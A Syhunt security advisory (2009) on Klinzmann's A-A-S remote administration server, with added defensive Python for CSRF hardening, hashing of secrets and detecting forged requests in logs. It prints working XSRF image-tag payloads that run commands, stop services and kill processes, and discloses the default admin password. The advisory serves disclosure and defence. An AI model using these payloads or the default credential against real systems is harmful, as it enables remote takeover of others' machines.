Klinzmann A-A-S XSRF / Code Execution

Source: packetstormsecurity.com (PACKETSTORM:77441)
Author: Felipe Daragon
Published: 2009-05-13

EPSS: 0.011 (Low), percentile 82.4%

Syhunt: A-A-S (Application Access Server) Multiple Security Vulnerabilities  
  
Advisory-ID: 200905111  
Discovery Date: 3.23.2009  
Release Date: 5.11.2009  
Affected Applications: A-A-S 2.0.48 and possibly older versions  
Class: XSRF (Cross Site Request Forgery) Arbitrary Command Execution,   
Undocumented Default Password, Insecure Password Storage  
Status: Vendor informed. No fix available  
Vendor: Klinzmann  
Vendor URL: http://www.klinzmann.name/a-a-s/index_en.html  
Advisory URL: http://www.syhunt.com/advisories/?id=aas-multiple  
  
The Common Vulnerabilities and Exposures (CVE) project has assigned the   
following CVEs to these vulnerabilities:  
* CVE-2009-1464 - index.aas job parameter XSRF Arbitrary Command   
Execution Vulnerability  
* CVE-2009-1465 - Default Admin Password Vulnerability  
* CVE-2009-1466 - Insecure Password and Port Keyword Storage Vulnerability  
  
----------------------------------------------------------------  
  
Overview:  
The Application Access Server is a popular freeware remote  
administration tool that allows starting and stopping applications or  
services over the Internet using a Web-based client. It also allows  
uninstalling applications, remotely shutting the machine down and  
retrieving various information about the system the server is running  
on. It claims to be able to "black list" aggressors and run in "Stealth  
mode", thus evading port scanners.  
  
The A-A-S server also supports DynDNS.org, which allows aliasing the   
server IP to a static hostname.  
  
Description:  
The Application Access Server is vulnerable to extremely dangerous XSRF  
(Cross Site Request Forgery) attacks. A remote attacker can use the XSRF  
flaw to take control of the system running the A-A-S server. The issue  
is triggered when a web page containing malicious JavaScript code is  
viewed. Such code can automatically make requests to the AAS server on  
the user's behalf.  
  
Two additional vulnerabilities affect the Application Access Server: an   
undocumented default password and insecure password storage. Technical   
details are included below.  
  
----------------------------------------------------------------  
  
Details:  
1) index.aas job parameter XSRF (Cross Site Request Forgery)  
Arbitrary Command Execution  
  
Example 1 - Arbitrary Command Execution / File Upload  
See: http://www.syhunt.com/advisories/aashack.txt  
  
This exploit demonstration code automatically makes sequential requests  
to the AAS server on the user's behalf (if the user is logged in to the  
server), disabling undesired services, then uploading and launching a  
file on the target machine. It has been successfully tested on IE 7.0 and  
Firefox 3.08, and should work on any browser that has JavaScript enabled.  
  
Please note that the server's security features, such as the host access  
list and the port modes (Silent or Stealth), will not protect against the  
XSRF flaw even when they are enabled.  
  
Example 2 - Arbitrary Command Execution:  
<img src="http://[AAS IP or DYNDNS   
HOST]:6262/index.aas?job=command&action=[command]">  
This for example would launch the Calculator:  
/index.aas?job=command&action=calc.exe  
  
Example 3 - Stopping Services:  
<img src="http://[AAS IP or DYNDNS   
HOST]:6262/index.aas?job=setservice&action=stop&select=[servicename]">  
This for example would disable Automatic Updates:  
/index.aas?job=setservice&action=stop&select=wuauserv  
  
Example 4 - Killing Processes:  
<img src="http://[AAS IP or DYNDNS   
HOST]:6262/index.aas?job=killprocess&select=[exename]">  
Example:  
/index.aas?job=killprocess&select=notepad.exe  
  
Additional commands are available via the job parameter.  
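The requests above succeed because the server executes any job that arrives with a logged-in session cookie, and the browser attaches that cookie to an `<img src=...>` fetch from a third-party page exactly as it does to a click in the real UI. The following Python model, an added example that is not code from the advisory or from the A-A-S vendor, puts that vulnerable dispatch beside a hardened one that applies the three checks a CSRF-resistant design needs: state-changing jobs only over POST, an Origin/Referer that names the server itself, and a per-session synchronizer token. The origin `http://aas.example:6262`, the session store and the header values are constructed assumptions; the job names are the ones the advisory lists.

```python
import hmac
import secrets
from typing import Dict
from urllib.parse import urlsplit

# Constructed stand-ins for an A-A-S style deployment. The origin is an
# assumption; the job names are the ones named in the advisory.
SERVER_ORIGIN = "http://aas.example:6262"
STATE_CHANGING_JOBS = {"command", "setservice", "killprocess"}

# Hypothetical in-memory session store: session id -> anti-CSRF token.
SESSIONS: Dict[str, str] = {}


def login(session_id: str) -> str:
    """Create a session and issue its per-session synchronizer token.
    The token is embedded in the server's own forms, never in a URL."""
    token = secrets.token_urlsafe(32)
    SESSIONS[session_id] = token
    return token


def vulnerable_dispatch(method: str, headers: dict, cookies: dict, params: dict) -> str:
    """Models the flaw in the advisory: a request is executed as soon as it
    carries a logged-in session cookie, whatever its method or where it was
    issued from. Method and headers are deliberately ignored here."""
    if cookies.get("session") not in SESSIONS:
        return "denied: not logged in"
    return f"executed job={params.get('job')}"


def _same_origin(headers: dict) -> bool:
    """Accept only requests whose Origin (or, failing that, Referer) names
    the server itself; a request carrying neither header is refused."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == SERVER_ORIGIN


def hardened_dispatch(method: str, headers: dict, cookies: dict, params: dict) -> str:
    """Same dispatch with the checks a CSRF-resistant design needs:
    state-changing jobs only over POST, only from the server's own pages,
    and only with the session's token. All three must pass."""
    session_id = cookies.get("session")
    if session_id not in SESSIONS:
        return "denied: not logged in"
    job = params.get("job")
    if job in STATE_CHANGING_JOBS:
        if method != "POST":
            return "denied: state-changing job over GET"
        if not _same_origin(headers):
            return "denied: cross-origin request"
        supplied = params.get("csrf_token", "")
        if not hmac.compare_digest(supplied.encode(), SESSIONS[session_id].encode()):
            return "denied: missing or wrong CSRF token"
    return f"executed job={job}"


def demo() -> dict:
    """Replay the advisory's Example 2 against both dispatchers."""
    token = login("victim-session")
    cookies = {"session": "victim-session"}
    forged_params = {"job": "command", "action": "calc.exe"}
    # Constructed: headers a browser sends for <img src=...> on a third-party page.
    forged_headers = {"Referer": "http://third-party.example/page.html"}
    # Constructed: a POST submitted from the server's own form.
    legit_headers = {"Origin": SERVER_ORIGIN}
    legit_params = dict(forged_params, csrf_token=token)
    return {
        "vulnerable_forged": vulnerable_dispatch("GET", forged_headers, cookies, forged_params),
        "hardened_forged": hardened_dispatch("GET", forged_headers, cookies, forged_params),
        "hardened_legit": hardened_dispatch("POST", legit_headers, cookies, legit_params),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The token check is the one that carries the weight: Origin and Referer are useful as an early filter but browsers and proxies sometimes omit them, which is why a missing header is treated as a rejection rather than a pass. Modern deployments add `SameSite` cookies as a further layer, but a server that still accepts state changes over a bare GET gains nothing from any of this.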
  
2) Default Admin Password Vulnerability  
By default, A-A-S installs with a default admin account. The account has  
an undocumented default password of "wildbat" and all security rights  
enabled. These default rights allow any command to be executed on the  
machine.  
  
3) Insecure Password and Port Keyword Storage Vulnerability  
A-A-S passwords and the port keyword (used to connect to the server when  
it is in Stealth or Silent mode) are stored as base64 strings in the  
"aas.ini" file in the A-A-S install directory, with no encryption at all.  
This allows the password or port keyword to be easily retrieved.  
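Base64 is an encoding, not encryption: anyone who can read aas.ini gets the original values back with a single decode call. The Python below, an added example rather than code from the advisory or the vendor, shows that on a constructed ini fragment (the `[server]` section and the key names are assumptions, the advisory only says the values are base64 strings) and then shows the form a fixed server should persist for secrets it only ever compares, such as the login password and the port keyword: a salted PBKDF2 hash that can be verified but not read back.

```python
import base64
import configparser
import hashlib
import hmac
import os
from typing import Optional

# Constructed aas.ini-style content. The advisory only says the values are
# base64 strings; the section and key names here are assumptions.
SAMPLE_INI = """[server]
password = cGFzc3dvcmQxMjM=
portkeyword = b3BlbnNlc2FtZQ==
"""


def read_base64_values(ini_text: str) -> dict:
    """Whoever can read the file recovers every secret with one call:
    base64 is a reversible encoding, not encryption."""
    cp = configparser.ConfigParser()
    cp.read_string(ini_text)
    return {key: base64.b64decode(value).decode() for key, value in cp["server"].items()}


# What a verifier should persist instead: a salted, iterated hash from
# which the secret cannot be read back.
ITERATIONS = 200_000


def hash_secret(secret: str, salt: Optional[bytes] = None) -> str:
    """Return 'pbkdf2_sha256$iterations$salt$digest' for storage."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", secret.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        ITERATIONS,
        base64.b64encode(salt).decode(),
        base64.b64encode(digest).decode(),
    )


def verify_secret(candidate: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    algorithm, iterations, salt_b64, digest_b64 = stored.split("$")
    if algorithm != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    actual = hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt, int(iterations))
    return hmac.compare_digest(actual, expected)


def migrate(ini_text: str) -> dict:
    """Replace each base64 value with its hash: the form a fixed server
    should write back for secrets it only ever compares."""
    return {key: hash_secret(value) for key, value in read_base64_values(ini_text).items()}


if __name__ == "__main__":
    print("recovered from base64:", read_base64_values(SAMPLE_INI))
    for key, stored in migrate(SAMPLE_INI).items():
        print(key, "->", stored)
```

Hashing only fits secrets the server compares. A credential it must send onward, such as the DynDNS.org account password the overview mentions, has to stay recoverable and belongs in OS-protected storage (DPAPI on Windows) with file permissions that keep other local users out, not in a world-readable ini file.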
  
----------------------------------------------------------------  
  
Vulnerability Status:  
The vendor was contacted, immediately responded and will be releasing a   
fix soon.  
  
As a workaround for the XSRF vulnerability, the vendor recommends  
limiting the security rights in the user settings screen for each user:  
- Disable the "Allow own command" option (command execution will no  
longer be possible once this option is disabled).  
- If possible, also disable the "Enable kill process", "Start/Stop  
service" and "Run application" rights.  
  
Completely avoid navigating to other websites while logged in to the  
Application Access Server.  
  
Never start the server with its default settings (as explained above,  
machines running a default A-A-S installation may be easily compromised).  
Change the password of the admin account first.  
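The workarounds above limit what a forged request can do; they do not tell an operator whether forged requests are being made. The following detection logic is an added example, not part of the advisory or the vendor's product. It assumes the A-A-S server is reached as `aas.example:6262` behind a reverse proxy that writes combined-format access logs (the A-A-S server's own log format is not described in the advisory), and it flags requests for the `command`, `setservice` and `killprocess` jobs named above whose Referer is a foreign site. The log lines are constructed replays of Examples 2 to 4 plus ordinary traffic for contrast.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumptions: the A-A-S server sits behind a reverse proxy that writes
# combined-format access logs, and it is reached as aas.example:6262.
SERVER_HOST = "aas.example:6262"
SENSITIVE_JOBS = {"command", "setservice", "killprocess"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed log lines replaying the advisory's examples, plus ordinary
# traffic for contrast.
SAMPLE_LOG = """\
203.0.113.5 - - [13/May/2009:10:02:11 +0000] "GET /index.aas?job=command&action=calc.exe HTTP/1.1" 200 512 "http://third-party.example/page.html" "Mozilla/5.0"
203.0.113.5 - - [13/May/2009:10:02:12 +0000] "GET /index.aas?job=setservice&action=stop&select=wuauserv HTTP/1.1" 200 512 "http://third-party.example/page.html" "Mozilla/5.0"
203.0.113.5 - - [13/May/2009:10:05:40 +0000] "GET /index.aas?job=killprocess&select=notepad.exe HTTP/1.1" 200 512 "http://aas.example:6262/index.aas" "Mozilla/5.0"
198.51.100.9 - - [13/May/2009:10:07:03 +0000] "GET /index.aas?job=killprocess&select=notepad.exe HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [13/May/2009:10:07:04 +0000] "GET /favicon.ico HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""


def parse_line(line: str):
    """Split one combined-format line into its fields and query parameters."""
    match = LOG_RE.match(line)
    if match is None:
        return None
    entry = match.groupdict()
    parts = urlsplit(entry["path"])
    entry["endpoint"] = parts.path
    entry["params"] = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return entry


def classify(entry: dict):
    """Return a verdict for a sensitive job request, or None when the
    request looks like use of the server's own UI."""
    if entry["endpoint"] != "/index.aas":
        return None
    job = entry["params"].get("job")
    if job not in SENSITIVE_JOBS:
        return None
    referer = entry["referer"]
    if referer in ("", "-"):
        return "suspicious: sensitive job with no Referer"
    referer_host = urlsplit(referer).netloc
    if referer_host != SERVER_HOST:
        return f"likely XSRF: sensitive job referred from {referer_host}"
    return None


def scan(log_text: str) -> list:
    """Run the classifier over every line; each finding is
    (client ip, job, target argument, verdict)."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        verdict = classify(entry)
        if verdict is not None:
            params = entry["params"]
            target = params.get("select") or params.get("action")
            findings.append((entry["ip"], params["job"], target, verdict))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The "no Referer" verdict is deliberately weaker than the foreign-Referer one: browsers and privacy extensions drop the header for many reasons, so its absence is a prompt to look, not proof of forgery. A foreign Referer on a `command` or `setservice` request, by contrast, has no benign explanation in this product and is worth an alert on its own.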
  
----------------------------------------------------------------  
  
Credit:  
Felipe Daragon  
Syhunt Security Research Team, www.syhunt.com  
  
---  
  
Copyright © 2009 Syhunt Cyber Security Company  
  
Disclaimer:  
The information in this advisory is provided "as is" without warranty of   
any kind. Details provided are strictly for educational and defensive   
purposes.  
  
Syhunt is not liable for any damages caused by direct or indirect use of   
the information provided by this advisory.  
